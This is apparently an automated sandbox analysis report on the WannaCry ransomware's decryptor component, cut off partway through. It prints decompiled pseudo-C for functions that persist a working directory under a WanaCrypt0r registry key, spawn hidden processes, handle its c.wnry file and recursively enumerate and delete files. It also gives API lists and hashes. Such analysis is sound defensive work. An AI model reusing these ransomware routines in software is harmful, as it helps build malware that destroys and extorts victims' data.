                                                      control_flow_graph 142 401c70-401cd8 wcscat 143 401cdc-401cde 142->143 144 401ce0-401cef 143->144 145 401cf1-401cfb 143->145 146 401d00-401d0c RegCreateKeyW 144->146 145->146 147 401d12-401d1b 146->147 148 401dad-401db5 146->148 149 401d62-401d8e RegQueryValueExA 147->149 150 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 147->150 148->143 151 401dbb-401dc7 148->151 152 401d9e-401dab RegCloseKey 149->152 153 401d90-401d98 SetCurrentDirectoryA 149->153 150->152 152->148 154 401dc8-401dd7 152->154 153->152
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                                      0x00401c95
                                                      0x00401ca3
                                                      0x00401caf
                                                      0x00401cb1
                                                      0x00401cb3
                                                      0x00401cb8
                                                      0x00401cc1
                                                      0x00401cd6
                                                      0x00401cd8
                                                      0x00401cdc
                                                      0x00401cde
                                                      0x00401d00
                                                      0x00401ce0
                                                      0x00401d00
                                                      0x00401d00
                                                      0x00401d06
                                                      0x00401d0c
                                                      0x00000000
                                                      0x00401d12
                                                      0x00401d12
                                                      0x00401d1b
                                                      0x00401d79
                                                      0x00401d81
                                                      0x00401d8b
                                                      0x00401d8d
                                                      0x00401d8e
                                                      0x00401d98
                                                      0x00401d98
                                                      0x00401d1d
                                                      0x00401d2a
                                                      0x00401d38
                                                      0x00401d53
                                                      0x00401d55
                                                      0x00401d5d
                                                      0x00401d5f
                                                      0x00401d5f
                                                      0x00401da3
                                                      0x00401dab
                                                      0x00401dd7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401dab
                                                      0x00000000
                                                      0x00401dad
                                                      0x00401dad
                                                      0x00401db1
                                                      0x00401db1
                                                      0x00401dc7
                                                      0x00000000

                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 155 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 156 408660-4086a6 #6140 155->156 157 408654-408658 155->157 157->156 158 40865a-40865e GetSysColor 157->158 158->156
                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                                      0x004085c0
                                                      0x004085c2
                                                      0x004085cd
                                                      0x004085ce
                                                      0x004085db
                                                      0x004085de
                                                      0x004085e2
                                                      0x004085e7
                                                      0x004085f2
                                                      0x004085f6
                                                      0x00408601
                                                      0x00408604
                                                      0x00408607
                                                      0x0040860a
                                                      0x00408612
                                                      0x00408617
                                                      0x00408621
                                                      0x00408628
                                                      0x0040862f
                                                      0x00408634
                                                      0x00408642
                                                      0x00408646
                                                      0x0040864a
                                                      0x00408652
                                                      0x0040865e
                                                      0x0040865e
                                                      0x00408660
                                                      0x00408662
                                                      0x00408667
                                                      0x00408674
                                                      0x0040867d
                                                      0x00408680
                                                      0x00408687
                                                      0x0040868a
                                                      0x00408691
                                                      0x00408694
                                                      0x0040869c
                                                      0x004086a6

                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690

                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID:
                                                      • API String ID: 962039509-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 163 401a90-401aeb CreateProcessA 164 401b45-401b4c 163->164 165 401aed-401af3 163->165 166 401af5-401b03 WaitForSingleObject 165->166 167 401b26-401b44 CloseHandle * 2 165->167 168 401b12-401b18 166->168 169 401b05-401b0c TerminateProcess 166->169 168->167 170 401b1a-401b20 GetExitCodeProcess 168->170 169->168 170->167
                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				int _t23;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				_t23 = CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84); // executed
				if(_t23 == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}









                                                      0x00401aa0
                                                      0x00401aa8
                                                      0x00401ab5
                                                      0x00401abb
                                                      0x00401ac5
                                                      0x00401ad2
                                                      0x00401ad6
                                                      0x00401ade
                                                      0x00401ae3
                                                      0x00401aeb
                                                      0x00401b4c
                                                      0x00401aed
                                                      0x00401aed
                                                      0x00401af3
                                                      0x00401b03
                                                      0x00401b0c
                                                      0x00401b0c
                                                      0x00401b12
                                                      0x00401b18
                                                      0x00401b20
                                                      0x00401b20
                                                      0x00401b18
                                                      0x00401b31
                                                      0x00401b38
                                                      0x00401b44
                                                      0x00401b44

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                      • String ID: D
                                                      • API String ID: 786732093-2746444292
                                                      • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                                      • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 171 401a10-401a18 172 401a21 171->172 173 401a1a-401a1f 171->173 174 401a26-401a38 fopen 172->174 173->174 175 401a3a-401a44 174->175 176 401a6f-401a73 174->176 177 401a53-401a58 fwrite 175->177 178 401a46-401a51 fread 175->178 179 401a5e-401a64 177->179 178->179 180 401a74-401a84 fclose 179->180 181 401a66-401a6c fclose 179->181 181->176
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 182 4043e0-404408 #4284 #3874 #5277
                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                                      0x004043e1
                                                      0x004043e3
                                                      0x004043ea
                                                      0x004043ec
                                                      0x004043f1
                                                      0x004043f6
                                                      0x004043f7
                                                      0x004043fe
                                                      0x00404402
                                                      0x00404408

                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                                      • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 4133e6-4133fb #1576
                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                                      0x004133e6
                                                      0x004133e6
                                                      0x004133ea
                                                      0x004133ee
                                                      0x004133f2
                                                      0x004133f6
                                                      0x004133fb

                                                      APIs
                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                                      • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 334 4026b0-40274b call 40c8f0 * 2 swprintf FindFirstFileW 339 4027b4-4027bc 334->339 340 40274d-4027af call 402e00 #825 call 402e00 #825 334->340 342 4027c2-4027ca 339->342 356 402ace-402ae4 340->356 344 4027d4-4027e8 wcscmp 342->344 345 4027cc-4027ce 342->345 348 40295d-402972 FindNextFileW 344->348 349 4027ee-402802 wcscmp 344->349 345->344 347 402978-40298b FindClose 345->347 351 4029b9-4029c1 347->351 352 40298d-402995 347->352 348->342 348->347 349->348 353 402808-402838 swprintf GetFileAttributesW 349->353 354 4029c3-4029cb 351->354 355 4029ef-402a4d swprintf DeleteFileW swprintf DeleteFileW 351->355 357 402997-402999 352->357 358 40299b-4029a0 352->358 359 4028b6-4028ca wcscmp 353->359 360 40283a-402850 call 402af0 353->360 362 4029d1-4029d6 354->362 363 4029cd-4029cf 354->363 364 402a6a-402a92 #825 355->364 365 402a4f-402a64 call 402e90 355->365 357->351 357->358 367 4029a2 358->367 368 4029a7-4029b7 call 402560 358->368 359->348 361 4028d0-4028e4 wcscmp 359->361 360->348 380 402856-4028b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 360->380 361->348 369 4028e6-4028fa wcscmp 361->369 370 4029d8 362->370 371 4029dd-4029ed call 4026b0 362->371 363->355 363->362 374 402a94-402ab8 call 402d90 call 402e90 364->374 375 402aba-402acd #825 364->375 386 402a66 365->386 367->368 368->351 368->352 369->348 377 4028fc-402953 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 369->377 370->371 371->354 371->355 374->375 375->356 391 402957 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 377->391 380->391 386->364 391->348
                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
